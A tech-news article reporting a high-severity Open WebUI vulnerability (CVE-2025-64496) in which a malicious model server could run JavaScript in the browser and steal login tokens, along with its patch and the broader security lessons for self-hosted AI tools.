A Major Open WebUI Flaw Could Have Let Hackers Steal Your AI Chats

A Major Open WebUI Flaw Could Have Let Hackers Steal Your AI Chats - Professional coverage

According to Infosecurity Magazine, a high-severity security vulnerability has been uncovered in Open WebUI, the popular open-source interface for AI models. The flaw, tracked as CVE-2025-64496 and discovered by Cato Networks, impacts versions 0.6.34 and older when the Direct Connections feature is enabled. It carries a severity rating of 7.3 out of 10 and was reported to maintainers in October 2025. The bug was publicly disclosed on November 7, 2025, after patch validation. The core risk is account takeover, where an attacker could steal authentication tokens and gain full access to a user’s chats, documents, and API keys.

Special Offer Banner

The Trust Problem With AI Connections

So here’s the thing. Open WebUI’s Direct Connections feature is super useful. It lets you point the interface at your own, self-hosted AI model server or any OpenAI-compatible endpoint. But that flexibility comes with a huge, often overlooked, assumption: you have to trust that external server completely. This vulnerability proves that assumption can be deadly. The flaw was in how the browser handled messages from that server. A malicious server could send a crafted message that would execute JavaScript in your browser, right then and there. Basically, by tricking you into connecting to a bad server, an attacker could rifle through your browser’s localStorage and steal your login tokens. Game over.

Beyond The Patch, What’s Left?

Now, the good news is the patch in version 0.6.35 seems effective. It blocks those malicious “execute” events. But let’s be real—patching the software is only the first step. The researchers at Cato Networks point out that organizations need to do more. They need stronger authentication, better sandboxing for extensible features, and stricter resource access controls. This is a classic case of closing one door while realizing your whole security model has too many windows open. It also highlights a massive challenge for any tool that becomes a “hub” for connecting to other services. How do you enable powerful integrations without handing over the keys to the kingdom?

A Wake-Up Call For Self-Hosted AI

This whole episode is a fascinating stress test for the self-hosted AI ecosystem. Everyone’s rushing to deploy their own local or private cloud models, and tools like Open WebUI are the friendly face on that complexity. But we often forget that “self-hosted” doesn’t automatically mean “secure.” You’re still stitching together different components, and the chain is only as strong as its weakest link—which, in this case, was the trust mechanism between the UI and the model server. It makes you wonder, how many other similar tools have features built on similarly shaky ground? The fix is out, so update immediately if you’re running Open WebUI. But the bigger lesson is about architectural trust. In the race for AI flexibility, security can’t be an afterthought.

Leave a Reply

Your email address will not be published. Required fields are marked *